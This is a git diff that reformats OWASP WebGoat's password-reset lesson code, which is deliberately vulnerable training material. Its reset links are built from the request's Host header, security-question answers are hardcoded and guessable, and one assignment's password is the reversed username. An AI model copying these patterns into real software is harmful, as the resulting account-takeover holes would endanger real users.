diff --git a/src/main/java/org/owasp/webgoat/lessons/passwordreset/PasswordReset.java b/src/main/java/org/owasp/webgoat/lessons/passwordreset/PasswordReset.java
index eea060533..79cc05120 100644
--- a/src/main/java/org/owasp/webgoat/lessons/passwordreset/PasswordReset.java
+++ b/src/main/java/org/owasp/webgoat/lessons/passwordreset/PasswordReset.java
@@ -28,13 +28,13 @@ import org.springframework.stereotype.Component;
 
 @Component
 public class PasswordReset extends Lesson {
-    @Override
-    public Category getDefaultCategory() {
-        return Category.A7;
-    }
+  @Override
+  public Category getDefaultCategory() {
+    return Category.A7;
+  }
 
-    @Override
-    public String getTitle() {
-        return "password-reset.title";
-    }
+  @Override
+  public String getTitle() {
+    return "password-reset.title";
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/passwordreset/PasswordResetEmail.java b/src/main/java/org/owasp/webgoat/lessons/passwordreset/PasswordResetEmail.java
index 7f21050dc..ef1f723a5 100644
--- a/src/main/java/org/owasp/webgoat/lessons/passwordreset/PasswordResetEmail.java
+++ b/src/main/java/org/owasp/webgoat/lessons/passwordreset/PasswordResetEmail.java
@@ -22,19 +22,18 @@
 
 package org.owasp.webgoat.lessons.passwordreset;
 
-import lombok.Builder;
-import lombok.Data;
-
 import java.io.Serializable;
 import java.time.LocalDateTime;
+import lombok.Builder;
+import lombok.Data;
 
 @Builder
 @Data
 public class PasswordResetEmail implements Serializable {
 
-    private LocalDateTime time;
-    private String contents;
-    private String sender;
-    private String title;
-    private String recipient;
+  private LocalDateTime time;
+  private String contents;
+  private String sender;
+  private String title;
+  private String recipient;
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/passwordreset/QuestionsAssignment.java b/src/main/java/org/owasp/webgoat/lessons/passwordreset/QuestionsAssignment.java
index 88ac80fff..8568b97ec 100644
--- a/src/main/java/org/owasp/webgoat/lessons/passwordreset/QuestionsAssignment.java
+++ b/src/main/java/org/owasp/webgoat/lessons/passwordreset/QuestionsAssignment.java
@@ -22,6 +22,8 @@
 
 package org.owasp.webgoat.lessons.passwordreset;
 
+import java.util.HashMap;
+import java.util.Map;
 import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
 import org.owasp.webgoat.container.assignments.AttackResult;
 import org.springframework.http.MediaType;
@@ -30,9 +32,6 @@ import org.springframework.web.bind.annotation.RequestParam;
 import org.springframework.web.bind.annotation.ResponseBody;
 import org.springframework.web.bind.annotation.RestController;
 
-import java.util.HashMap;
-import java.util.Map;
-
 /**
  * @author nbaars
  * @since 8/20/17.
@@ -40,32 +39,37 @@ import java.util.Map;
 @RestController
 public class QuestionsAssignment extends AssignmentEndpoint {
 
-    private static final Map<String, String> COLORS = new HashMap<>();
+  private static final Map<String, String> COLORS = new HashMap<>();
 
-    static {
-        COLORS.put("admin", "green");
-        COLORS.put("jerry", "orange");
-        COLORS.put("tom", "purple");
-        COLORS.put("larry", "yellow");
-        COLORS.put("webgoat", "red");
+  static {
+    COLORS.put("admin", "green");
+    COLORS.put("jerry", "orange");
+    COLORS.put("tom", "purple");
+    COLORS.put("larry", "yellow");
+    COLORS.put("webgoat", "red");
+  }
+
+  @PostMapping(
+      path = "/PasswordReset/questions",
+      consumes = MediaType.APPLICATION_FORM_URLENCODED_VALUE)
+  @ResponseBody
+  public AttackResult passwordReset(@RequestParam Map<String, Object> json) {
+    String securityQuestion = (String) json.getOrDefault("securityQuestion", "");
+    String username = (String) json.getOrDefault("username", "");
+
+    if ("webgoat".equalsIgnoreCase(username.toLowerCase())) {
+      return failed(this).feedback("password-questions-wrong-user").build();
     }
 
-    @PostMapping(path = "/PasswordReset/questions", consumes = MediaType.APPLICATION_FORM_URLENCODED_VALUE)
-    @ResponseBody
-    public AttackResult passwordReset(@RequestParam Map<String, Object> json) {
-        String securityQuestion = (String) json.getOrDefault("securityQuestion", "");
-        String username = (String) json.getOrDefault("username", "");
-
-        if ("webgoat".equalsIgnoreCase(username.toLowerCase())) {
-            return failed(this).feedback("password-questions-wrong-user").build();
-        }
-
-        String validAnswer = COLORS.get(username.toLowerCase());
-        if (validAnswer == null) {
-            return failed(this).feedback("password-questions-unknown-user").feedbackArgs(username).build();
-        } else if (validAnswer.equals(securityQuestion)) {
-            return success(this).build();
-        }
-        return failed(this).build();
+    String validAnswer = COLORS.get(username.toLowerCase());
+    if (validAnswer == null) {
+      return failed(this)
+          .feedback("password-questions-unknown-user")
+          .feedbackArgs(username)
+          .build();
+    } else if (validAnswer.equals(securityQuestion)) {
+      return success(this).build();
     }
+    return failed(this).build();
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/passwordreset/ResetLinkAssignment.java b/src/main/java/org/owasp/webgoat/lessons/passwordreset/ResetLinkAssignment.java
index d8bfce33d..ace84be78 100644
--- a/src/main/java/org/owasp/webgoat/lessons/passwordreset/ResetLinkAssignment.java
+++ b/src/main/java/org/owasp/webgoat/lessons/passwordreset/ResetLinkAssignment.java
@@ -23,6 +23,10 @@
 package org.owasp.webgoat.lessons.passwordreset;
 
 import com.google.common.collect.Maps;
+import java.util.ArrayList;
+import java.util.HashMap;
+import java.util.List;
+import java.util.Map;
 import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
 import org.owasp.webgoat.container.assignments.AssignmentHints;
 import org.owasp.webgoat.container.assignments.AttackResult;
@@ -38,94 +42,100 @@ import org.springframework.web.bind.annotation.ResponseBody;
 import org.springframework.web.bind.annotation.RestController;
 import org.springframework.web.servlet.ModelAndView;
 
-import java.util.ArrayList;
-import java.util.HashMap;
-import java.util.List;
-import java.util.Map;
-
 /**
  * @author nbaars
  * @since 8/20/17.
  */
 @RestController
-@AssignmentHints({"password-reset-hint1", "password-reset-hint2", "password-reset-hint3", "password-reset-hint4", "password-reset-hint5", "password-reset-hint6"})
+@AssignmentHints({
+  "password-reset-hint1",
+  "password-reset-hint2",
+  "password-reset-hint3",
+  "password-reset-hint4",
+  "password-reset-hint5",
+  "password-reset-hint6"
+})
 public class ResetLinkAssignment extends AssignmentEndpoint {
 
-    static final String PASSWORD_TOM_9 = "somethingVeryRandomWhichNoOneWillEverTypeInAsPasswordForTom";
-    static final String TOM_EMAIL = "tom@webgoat-cloud.org";
-    static Map<String, String> userToTomResetLink = new HashMap<>();
-    static Map<String, String> usersToTomPassword = Maps.newHashMap();
-    static List<String> resetLinks = new ArrayList<>();
+  static final String PASSWORD_TOM_9 =
+      "somethingVeryRandomWhichNoOneWillEverTypeInAsPasswordForTom";
+  static final String TOM_EMAIL = "tom@webgoat-cloud.org";
+  static Map<String, String> userToTomResetLink = new HashMap<>();
+  static Map<String, String> usersToTomPassword = Maps.newHashMap();
+  static List<String> resetLinks = new ArrayList<>();
 
-    static final String TEMPLATE = "Hi, you requested a password reset link, please use this "
-            + "<a target='_blank' href='http://%s/WebGoat/PasswordReset/reset/reset-password/%s'>link</a> to reset your password."
-            + "\n \n\n"
-            + "If you did not request this password change you can ignore this message."
-            + "\n"
-            + "If you have any comments or questions, please do not hesitate to reach us at support@webgoat-cloud.org"
-            + "\n\n"
-            + "Kind regards, \nTeam WebGoat";
+  static final String TEMPLATE =
+      "Hi, you requested a password reset link, please use this <a target='_blank'"
+          + " href='http://%s/WebGoat/PasswordReset/reset/reset-password/%s'>link</a> to reset your"
+          + " password.\n"
+          + " \n\n"
+          + "If you did not request this password change you can ignore this message.\n"
+          + "If you have any comments or questions, please do not hesitate to reach us at"
+          + " support@webgoat-cloud.org\n\n"
+          + "Kind regards, \n"
+          + "Team WebGoat";
 
-
-    @PostMapping("/PasswordReset/reset/login")
-    @ResponseBody
-    public AttackResult login(@RequestParam String password, @RequestParam String email) {
-        if (TOM_EMAIL.equals(email)) {
-            String passwordTom = usersToTomPassword.getOrDefault(getWebSession().getUserName(), PASSWORD_TOM_9);
-            if (passwordTom.equals(PASSWORD_TOM_9)) {
-                return failed(this).feedback("login_failed").build();
-            } else if (passwordTom.equals(password)) {
-                return success(this).build();
-            }
-        }
-        return failed(this).feedback("login_failed.tom").build();
+  @PostMapping("/PasswordReset/reset/login")
+  @ResponseBody
+  public AttackResult login(@RequestParam String password, @RequestParam String email) {
+    if (TOM_EMAIL.equals(email)) {
+      String passwordTom =
+          usersToTomPassword.getOrDefault(getWebSession().getUserName(), PASSWORD_TOM_9);
+      if (passwordTom.equals(PASSWORD_TOM_9)) {
+        return failed(this).feedback("login_failed").build();
+      } else if (passwordTom.equals(password)) {
+        return success(this).build();
+      }
     }
+    return failed(this).feedback("login_failed.tom").build();
+  }
 
-    @GetMapping("/PasswordReset/reset/reset-password/{link}")
-    public ModelAndView resetPassword(@PathVariable(value = "link") String link, Model model) {
-    	ModelAndView modelAndView = new ModelAndView();
-        if (ResetLinkAssignment.resetLinks.contains(link)) {
-            PasswordChangeForm form = new PasswordChangeForm();
-            form.setResetLink(link);
-            model.addAttribute("form", form);
-            modelAndView.addObject("form", form);
-            modelAndView.setViewName("password_reset"); //Display html page for changing password
-        } else {
-        	modelAndView.setViewName("password_link_not_found");
-        }
-        return modelAndView;
+  @GetMapping("/PasswordReset/reset/reset-password/{link}")
+  public ModelAndView resetPassword(@PathVariable(value = "link") String link, Model model) {
+    ModelAndView modelAndView = new ModelAndView();
+    if (ResetLinkAssignment.resetLinks.contains(link)) {
+      PasswordChangeForm form = new PasswordChangeForm();
+      form.setResetLink(link);
+      model.addAttribute("form", form);
+      modelAndView.addObject("form", form);
+      modelAndView.setViewName("password_reset"); // Display html page for changing password
+    } else {
+      modelAndView.setViewName("password_link_not_found");
     }
+    return modelAndView;
+  }
 
-    @GetMapping("/PasswordReset/reset/change-password")
-    public ModelAndView illegalCall() {
-    	ModelAndView modelAndView = new ModelAndView();
-    	modelAndView.setViewName("password_link_not_found");
-    	return modelAndView;
-    }
-    
-    @PostMapping("/PasswordReset/reset/change-password")
-    public ModelAndView changePassword(@ModelAttribute("form") PasswordChangeForm form, BindingResult bindingResult) {
-    	ModelAndView modelAndView = new ModelAndView();
-        if (!org.springframework.util.StringUtils.hasText(form.getPassword())) {
-            bindingResult.rejectValue("password", "not.empty");
-        }
-        if (bindingResult.hasErrors()) {
-        	modelAndView.setViewName("password_reset");
-        	return modelAndView;
-        }
-        if (!resetLinks.contains(form.getResetLink())) {
-        	modelAndView.setViewName("password_link_not_found");
-        	return modelAndView;
-        }
-        if (checkIfLinkIsFromTom(form.getResetLink())) {
-            usersToTomPassword.put(getWebSession().getUserName(), form.getPassword());
-        }
-        modelAndView.setViewName("lessons/passwordreset/templates/success.html");
-        return modelAndView;
-    }
+  @GetMapping("/PasswordReset/reset/change-password")
+  public ModelAndView illegalCall() {
+    ModelAndView modelAndView = new ModelAndView();
+    modelAndView.setViewName("password_link_not_found");
+    return modelAndView;
+  }
 
-    private boolean checkIfLinkIsFromTom(String resetLinkFromForm) {
-        String resetLink = userToTomResetLink.getOrDefault(getWebSession().getUserName(), "unknown");
-        return resetLink.equals(resetLinkFromForm);
+  @PostMapping("/PasswordReset/reset/change-password")
+  public ModelAndView changePassword(
+      @ModelAttribute("form") PasswordChangeForm form, BindingResult bindingResult) {
+    ModelAndView modelAndView = new ModelAndView();
+    if (!org.springframework.util.StringUtils.hasText(form.getPassword())) {
+      bindingResult.rejectValue("password", "not.empty");
     }
+    if (bindingResult.hasErrors()) {
+      modelAndView.setViewName("password_reset");
+      return modelAndView;
+    }
+    if (!resetLinks.contains(form.getResetLink())) {
+      modelAndView.setViewName("password_link_not_found");
+      return modelAndView;
+    }
+    if (checkIfLinkIsFromTom(form.getResetLink())) {
+      usersToTomPassword.put(getWebSession().getUserName(), form.getPassword());
+    }
+    modelAndView.setViewName("lessons/passwordreset/templates/success.html");
+    return modelAndView;
+  }
+
+  private boolean checkIfLinkIsFromTom(String resetLinkFromForm) {
+    String resetLink = userToTomResetLink.getOrDefault(getWebSession().getUserName(), "unknown");
+    return resetLink.equals(resetLinkFromForm);
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/passwordreset/ResetLinkAssignmentForgotPassword.java b/src/main/java/org/owasp/webgoat/lessons/passwordreset/ResetLinkAssignmentForgotPassword.java
index c17529aea..34b8ee856 100644
--- a/src/main/java/org/owasp/webgoat/lessons/passwordreset/ResetLinkAssignmentForgotPassword.java
+++ b/src/main/java/org/owasp/webgoat/lessons/passwordreset/ResetLinkAssignmentForgotPassword.java
@@ -22,6 +22,8 @@
 
 package org.owasp.webgoat.lessons.passwordreset;
 
+import java.util.UUID;
+import javax.servlet.http.HttpServletRequest;
 import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
 import org.owasp.webgoat.container.assignments.AttackResult;
 import org.springframework.beans.factory.annotation.Value;
@@ -34,9 +36,6 @@ import org.springframework.web.bind.annotation.ResponseBody;
 import org.springframework.web.bind.annotation.RestController;
 import org.springframework.web.client.RestTemplate;
 
-import javax.servlet.http.HttpServletRequest;
-import java.util.UUID;
-
 /**
  * Part of the password reset assignment. Used to send the e-mail.
  *
@@ -46,59 +45,70 @@ import java.util.UUID;
 @RestController
 public class ResetLinkAssignmentForgotPassword extends AssignmentEndpoint {
 
-    private final RestTemplate restTemplate;
-    private String webWolfHost;
-    private String webWolfPort;
-    private final String webWolfMailURL;
+  private final RestTemplate restTemplate;
+  private String webWolfHost;
+  private String webWolfPort;
+  private final String webWolfMailURL;
 
-    public ResetLinkAssignmentForgotPassword(RestTemplate restTemplate,
-                                             @Value("${webwolf.host}") String webWolfHost,
-                                             @Value("${webwolf.port}") String webWolfPort,
-                                             @Value("${webwolf.mail.url}") String webWolfMailURL) {
-        this.restTemplate = restTemplate;
-        this.webWolfHost = webWolfHost;
-        this.webWolfPort = webWolfPort;
-        this.webWolfMailURL = webWolfMailURL;
+  public ResetLinkAssignmentForgotPassword(
+      RestTemplate restTemplate,
+      @Value("${webwolf.host}") String webWolfHost,
+      @Value("${webwolf.port}") String webWolfPort,
+      @Value("${webwolf.mail.url}") String webWolfMailURL) {
+    this.restTemplate = restTemplate;
+    this.webWolfHost = webWolfHost;
+    this.webWolfPort = webWolfPort;
+    this.webWolfMailURL = webWolfMailURL;
+  }
+
+  @PostMapping("/PasswordReset/ForgotPassword/create-password-reset-link")
+  @ResponseBody
+  public AttackResult sendPasswordResetLink(
+      @RequestParam String email, HttpServletRequest request) {
+    String resetLink = UUID.randomUUID().toString();
+    ResetLinkAssignment.resetLinks.add(resetLink);
+    String host = request.getHeader("host");
+    if (ResetLinkAssignment.TOM_EMAIL.equals(email)
+        && (host.contains(webWolfPort)
+            || host.contains(webWolfHost))) { // User indeed changed the host header.
+      ResetLinkAssignment.userToTomResetLink.put(getWebSession().getUserName(), resetLink);
+      fakeClickingLinkEmail(host, resetLink);
+    } else {
+      try {
+        sendMailToUser(email, host, resetLink);
+      } catch (Exception e) {
+        return failed(this).output("E-mail can't be send. please try again.").build();
+      }
     }
 
-    @PostMapping("/PasswordReset/ForgotPassword/create-password-reset-link")
-    @ResponseBody
-    public AttackResult sendPasswordResetLink(@RequestParam String email, HttpServletRequest request) {
-        String resetLink = UUID.randomUUID().toString();
-        ResetLinkAssignment.resetLinks.add(resetLink);
-        String host = request.getHeader("host");
-        if (ResetLinkAssignment.TOM_EMAIL.equals(email) && (host.contains(webWolfPort) || host.contains(webWolfHost))) { //User indeed changed the host header.
-            ResetLinkAssignment.userToTomResetLink.put(getWebSession().getUserName(), resetLink);
-            fakeClickingLinkEmail(host, resetLink);
-        } else {
-            try {
-                sendMailToUser(email, host, resetLink);
-            } catch (Exception e) {
-                return failed(this).output("E-mail can't be send. please try again.").build();
-            }
-        }
+    return success(this).feedback("email.send").feedbackArgs(email).build();
+  }
 
-        return success(this).feedback("email.send").feedbackArgs(email).build();
-    }
+  private void sendMailToUser(String email, String host, String resetLink) {
+    int index = email.indexOf("@");
+    String username = email.substring(0, index == -1 ? email.length() : index);
+    PasswordResetEmail mail =
+        PasswordResetEmail.builder()
+            .title("Your password reset link")
+            .contents(String.format(ResetLinkAssignment.TEMPLATE, host, resetLink))
+            .sender("password-reset@webgoat-cloud.net")
+            .recipient(username)
+            .build();
+    this.restTemplate.postForEntity(webWolfMailURL, mail, Object.class);
+  }
 
-    private void sendMailToUser(String email, String host, String resetLink) {
-        int index = email.indexOf("@");
-        String username = email.substring(0, index == -1 ? email.length() : index);
-        PasswordResetEmail mail = PasswordResetEmail.builder()
-                .title("Your password reset link")
-                .contents(String.format(ResetLinkAssignment.TEMPLATE, host, resetLink))
-                .sender("password-reset@webgoat-cloud.net")
-                .recipient(username).build();
-        this.restTemplate.postForEntity(webWolfMailURL, mail, Object.class);
-    }
-
-    private void fakeClickingLinkEmail(String host, String resetLink) {
-        try {
-            HttpHeaders httpHeaders = new HttpHeaders();
-            HttpEntity httpEntity = new HttpEntity(httpHeaders);
-            new RestTemplate().exchange(String.format("http://%s/PasswordReset/reset/reset-password/%s", host, resetLink), HttpMethod.GET, httpEntity, Void.class);
-        } catch (Exception e) {
-            //don't care
-        }
+  private void fakeClickingLinkEmail(String host, String resetLink) {
+    try {
+      HttpHeaders httpHeaders = new HttpHeaders();
+      HttpEntity httpEntity = new HttpEntity(httpHeaders);
+      new RestTemplate()
+          .exchange(
+              String.format("http://%s/PasswordReset/reset/reset-password/%s", host, resetLink),
+              HttpMethod.GET,
+              httpEntity,
+              Void.class);
+    } catch (Exception e) {
+      // don't care
     }
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/passwordreset/SecurityQuestionAssignment.java b/src/main/java/org/owasp/webgoat/lessons/passwordreset/SecurityQuestionAssignment.java
index 882b47bd2..044689717 100644
--- a/src/main/java/org/owasp/webgoat/lessons/passwordreset/SecurityQuestionAssignment.java
+++ b/src/main/java/org/owasp/webgoat/lessons/passwordreset/SecurityQuestionAssignment.java
@@ -22,6 +22,10 @@
 
 package org.owasp.webgoat.lessons.passwordreset;
 
+import static java.util.Optional.of;
+
+import java.util.HashMap;
+import java.util.Map;
 import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
 import org.owasp.webgoat.container.assignments.AttackResult;
 import org.springframework.beans.factory.annotation.Autowired;
@@ -30,11 +34,6 @@ import org.springframework.web.bind.annotation.RequestParam;
 import org.springframework.web.bind.annotation.ResponseBody;
 import org.springframework.web.bind.annotation.RestController;
 
-import java.util.HashMap;
-import java.util.Map;
-
-import static java.util.Optional.of;
-
 /**
  * Assignment for picking a good security question.
  *
@@ -44,42 +43,66 @@ import static java.util.Optional.of;
 @RestController
 public class SecurityQuestionAssignment extends AssignmentEndpoint {
 
-    @Autowired
-    private TriedQuestions triedQuestions;
+  @Autowired private TriedQuestions triedQuestions;
 
-    private static Map<String, String> questions;
+  private static Map<String, String> questions;
 
-    static {
-        questions = new HashMap<>();
-        questions.put("What is your favorite animal?", "The answer can easily be guessed and figured out through social media.");
-        questions.put("In what year was your mother born?", "Can  be easily guessed.");
-        questions.put("What was the time you were born?", "This may first seem like a good question, but you most likely dont know the exact time, so it might be hard to remember.");
-        questions.put("What is the name of the person you first kissed?", "Can be figured out through social media, or even guessed by trying the most common names.");
-        questions.put("What was the house number and street name you lived in as a child?", "Answer can be figured out through social media, or worse it might be your current address.");
-        questions.put("In what town or city was your first full time job?", "In times of LinkedIn and Facebook, the answer can be figured out quite easily.");
-        questions.put("In what city were you born?", "Easy to figure out through social media.");
-        questions.put("What was the last name of your favorite teacher in grade three?", "Most people would probably not know the answer to that.");
-        questions.put("What is the name of a college/job you applied to but didn't attend?", "It might not be easy to remember and an hacker could just try some company's/colleges in your area.");
-        questions.put("What are the last 5 digits of your drivers license?", "Is subject to change, and the last digit of your driver license might follow a specific pattern. (For example your birthday).");
-        questions.put("What was your childhood nickname?", "Not all people had a nickname.");
-        questions.put("Who was your childhood hero?", "Most Heroes we had as a child where quite obvious ones, like Superman for example.");
-        questions.put("On which wrist do you wear your watch?", "There are only to possible real answers, so really easy to guess.");
-        questions.put("What is your favorite color?", "Can easily be guessed.");
-    }
-
-    @PostMapping("/PasswordReset/SecurityQuestions")
-    @ResponseBody
-    public AttackResult completed(@RequestParam String question) {
-        var answer = of(questions.get(question));
-        if (answer.isPresent()) {
-            triedQuestions.incr(question);
-            if (triedQuestions.isComplete()) {
-                return success(this).output("<b>" + answer + "</b>").build();
-            }
-        }
-        return informationMessage(this)
-                .feedback("password-questions-one-successful")
-                .output(answer.orElse("Unknown question, please try again..."))
-                .build();
+  static {
+    questions = new HashMap<>();
+    questions.put(
+        "What is your favorite animal?",
+        "The answer can easily be guessed and figured out through social media.");
+    questions.put("In what year was your mother born?", "Can  be easily guessed.");
+    questions.put(
+        "What was the time you were born?",
+        "This may first seem like a good question, but you most likely dont know the exact time, so"
+            + " it might be hard to remember.");
+    questions.put(
+        "What is the name of the person you first kissed?",
+        "Can be figured out through social media, or even guessed by trying the most common"
+            + " names.");
+    questions.put(
+        "What was the house number and street name you lived in as a child?",
+        "Answer can be figured out through social media, or worse it might be your current"
+            + " address.");
+    questions.put(
+        "In what town or city was your first full time job?",
+        "In times of LinkedIn and Facebook, the answer can be figured out quite easily.");
+    questions.put("In what city were you born?", "Easy to figure out through social media.");
+    questions.put(
+        "What was the last name of your favorite teacher in grade three?",
+        "Most people would probably not know the answer to that.");
+    questions.put(
+        "What is the name of a college/job you applied to but didn't attend?",
+        "It might not be easy to remember and an hacker could just try some company's/colleges in"
+            + " your area.");
+    questions.put(
+        "What are the last 5 digits of your drivers license?",
+        "Is subject to change, and the last digit of your driver license might follow a specific"
+            + " pattern. (For example your birthday).");
+    questions.put("What was your childhood nickname?", "Not all people had a nickname.");
+    questions.put(
+        "Who was your childhood hero?",
+        "Most Heroes we had as a child where quite obvious ones, like Superman for example.");
+    questions.put(
+        "On which wrist do you wear your watch?",
+        "There are only to possible real answers, so really easy to guess.");
+    questions.put("What is your favorite color?", "Can easily be guessed.");
+  }
+
+  @PostMapping("/PasswordReset/SecurityQuestions")
+  @ResponseBody
+  public AttackResult completed(@RequestParam String question) {
+    var answer = of(questions.get(question));
+    if (answer.isPresent()) {
+      triedQuestions.incr(question);
+      if (triedQuestions.isComplete()) {
+        return success(this).output("<b>" + answer + "</b>").build();
+      }
     }
+    return informationMessage(this)
+        .feedback("password-questions-one-successful")
+        .output(answer.orElse("Unknown question, please try again..."))
+        .build();
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/passwordreset/SimpleMailAssignment.java b/src/main/java/org/owasp/webgoat/lessons/passwordreset/SimpleMailAssignment.java
index 42c4dce67..656732183 100644
--- a/src/main/java/org/owasp/webgoat/lessons/passwordreset/SimpleMailAssignment.java
+++ b/src/main/java/org/owasp/webgoat/lessons/passwordreset/SimpleMailAssignment.java
@@ -22,6 +22,9 @@
 
 package org.owasp.webgoat.lessons.passwordreset;
 
+import static java.util.Optional.ofNullable;
+
+import java.time.LocalDateTime;
 import org.apache.commons.lang3.StringUtils;
 import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
 import org.owasp.webgoat.container.assignments.AttackResult;
@@ -34,10 +37,6 @@ import org.springframework.web.bind.annotation.RestController;
 import org.springframework.web.client.RestClientException;
 import org.springframework.web.client.RestTemplate;
 
-import java.time.LocalDateTime;
-
-import static java.util.Optional.ofNullable;
-
 /**
  * @author nbaars
  * @since 8/20/17.
@@ -45,56 +44,74 @@ import static java.util.Optional.ofNullable;
 @RestController
 public class SimpleMailAssignment extends AssignmentEndpoint {
 
-    private final String webWolfURL;
-    private RestTemplate restTemplate;
+  private final String webWolfURL;
+  private RestTemplate restTemplate;
 
-    public SimpleMailAssignment(RestTemplate restTemplate, @Value("${webwolf.mail.url}") String webWolfURL) {
-        this.restTemplate = restTemplate;
-        this.webWolfURL = webWolfURL;
+  public SimpleMailAssignment(
+      RestTemplate restTemplate, @Value("${webwolf.mail.url}") String webWolfURL) {
+    this.restTemplate = restTemplate;
+    this.webWolfURL = webWolfURL;
+  }
+
+  @PostMapping(
+      path = "/PasswordReset/simple-mail",
+      consumes = MediaType.APPLICATION_FORM_URLENCODED_VALUE)
+  @ResponseBody
+  public AttackResult login(@RequestParam String email, @RequestParam String password) {
+    String emailAddress = ofNullable(email).orElse("unknown@webgoat.org");
+    String username = extractUsername(emailAddress);
+
+    if (username.equals(getWebSession().getUserName())
+        && StringUtils.reverse(username).equals(password)) {
+      return success(this).build();
+    } else {
+      return failed(this).feedbackArgs("password-reset-simple.password_incorrect").build();
     }
+  }
 
-    @PostMapping(path = "/PasswordReset/simple-mail", consumes = MediaType.APPLICATION_FORM_URLENCODED_VALUE)
-    @ResponseBody
-    public AttackResult login(@RequestParam String email, @RequestParam String password) {
-        String emailAddress = ofNullable(email).orElse("unknown@webgoat.org");
-        String username = extractUsername(emailAddress);
+  @PostMapping(
+      consumes = MediaType.APPLICATION_FORM_URLENCODED_VALUE,
+      value = "/PasswordReset/simple-mail/reset")
+  @ResponseBody
+  public AttackResult resetPassword(@RequestParam String emailReset) {
+    String email = ofNullable(emailReset).orElse("unknown@webgoat.org");
+    return sendEmail(extractUsername(email), email);
+  }
 
-        if (username.equals(getWebSession().getUserName()) && StringUtils.reverse(username).equals(password)) {
-            return success(this).build();
-        } else {
-            return failed(this).feedbackArgs("password-reset-simple.password_incorrect").build();
-        }
-    }
-
-    @PostMapping(consumes = MediaType.APPLICATION_FORM_URLENCODED_VALUE, value = "/PasswordReset/simple-mail/reset")
-    @ResponseBody
-    public AttackResult resetPassword(@RequestParam String emailReset) {
-        String email = ofNullable(emailReset).orElse("unknown@webgoat.org");
-        return sendEmail(extractUsername(email), email);
-    }
-
-    private String extractUsername(String email) {
-        int index = email.indexOf("@");
-        return email.substring(0, index == -1 ? email.length() : index);
-    }
-
-    private AttackResult sendEmail(String username, String email) {
-        if (username.equals(getWebSession().getUserName())) {
-            PasswordResetEmail mailEvent = PasswordResetEmail.builder()
-                    .recipient(username)
-                    .title("Simple e-mail assignment")
-                    .time(LocalDateTime.now())
-                    .contents("Thanks for resetting your password, your new password is: " + StringUtils.reverse(username))
-                    .sender("webgoat@owasp.org")
-                    .build();
-            try {
-                restTemplate.postForEntity(webWolfURL, mailEvent, Object.class);
-            } catch (RestClientException e) {
-                return informationMessage(this).feedback("password-reset-simple.email_failed").output(e.getMessage()).build();
-            }
-            return informationMessage(this).feedback("password-reset-simple.email_send").feedbackArgs(email).build();
-        } else {
-            return informationMessage(this).feedback("password-reset-simple.email_mismatch").feedbackArgs(username).build();
-        }
+  private String extractUsername(String email) {
+    int index = email.indexOf("@");
+    return email.substring(0, index == -1 ? email.length() : index);
+  }
+
+  private AttackResult sendEmail(String username, String email) {
+    if (username.equals(getWebSession().getUserName())) {
+      PasswordResetEmail mailEvent =
+          PasswordResetEmail.builder()
+              .recipient(username)
+              .title("Simple e-mail assignment")
+              .time(LocalDateTime.now())
+              .contents(
+                  "Thanks for resetting your password, your new password is: "
+                      + StringUtils.reverse(username))
+              .sender("webgoat@owasp.org")
+              .build();
+      try {
+        restTemplate.postForEntity(webWolfURL, mailEvent, Object.class);
+      } catch (RestClientException e) {
+        return informationMessage(this)
+            .feedback("password-reset-simple.email_failed")
+            .output(e.getMessage())
+            .build();
+      }
+      return informationMessage(this)
+          .feedback("password-reset-simple.email_send")
+          .feedbackArgs(email)
+          .build();
+    } else {
+      return informationMessage(this)
+          .feedback("password-reset-simple.email_mismatch")
+          .feedbackArgs(username)
+          .build();
     }
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/passwordreset/TriedQuestions.java b/src/main/java/org/owasp/webgoat/lessons/passwordreset/TriedQuestions.java
index 64d565b9f..d8f04167a 100644
--- a/src/main/java/org/owasp/webgoat/lessons/passwordreset/TriedQuestions.java
+++ b/src/main/java/org/owasp/webgoat/lessons/passwordreset/TriedQuestions.java
@@ -22,23 +22,22 @@
 
 package org.owasp.webgoat.lessons.passwordreset;
 
-import org.springframework.stereotype.Component;
-import org.springframework.web.context.annotation.SessionScope;
-
 import java.util.HashSet;
 import java.util.Set;
+import org.springframework.stereotype.Component;
+import org.springframework.web.context.annotation.SessionScope;
 
 @Component
 @SessionScope
 public class TriedQuestions {
 
-    private Set<String> answeredQuestions = new HashSet<>();
+  private Set<String> answeredQuestions = new HashSet<>();
 
-    public void incr(String question) {
-        answeredQuestions.add(question);
-    }
+  public void incr(String question) {
+    answeredQuestions.add(question);
+  }
 
-    public boolean isComplete() {
-        return answeredQuestions.size() > 1;
-    }
+  public boolean isComplete() {
+    return answeredQuestions.size() > 1;
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/passwordreset/resetlink/PasswordChangeForm.java b/src/main/java/org/owasp/webgoat/lessons/passwordreset/resetlink/PasswordChangeForm.java
index 267b39447..604c51fd3 100644
--- a/src/main/java/org/owasp/webgoat/lessons/passwordreset/resetlink/PasswordChangeForm.java
+++ b/src/main/java/org/owasp/webgoat/lessons/passwordreset/resetlink/PasswordChangeForm.java
@@ -1,10 +1,9 @@
 package org.owasp.webgoat.lessons.passwordreset.resetlink;
 
-import lombok.Getter;
-import lombok.Setter;
-
 import javax.validation.constraints.NotNull;
 import javax.validation.constraints.Size;
+import lombok.Getter;
+import lombok.Setter;
 
 /**
  * @author nbaars
@@ -14,9 +13,9 @@ import javax.validation.constraints.Size;
 @Setter
 public class PasswordChangeForm {
 
-    @NotNull
-    @Size(min = 6, max = 10)
-    private String password;
-    private String resetLink;
+  @NotNull
+  @Size(min = 6, max = 10)
+  private String password;
 
+  private String resetLink;
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/pathtraversal/PathTraversal.java b/src/main/java/org/owasp/webgoat/lessons/pathtraversal/PathTraversal.java
index da689cf42..ef61ae901 100644
--- a/src/main/java/org/owasp/webgoat/lessons/pathtraversal/PathTraversal.java
+++ b/src/main/java/org/owasp/webgoat/lessons/pathtraversal/PathTraversal.java
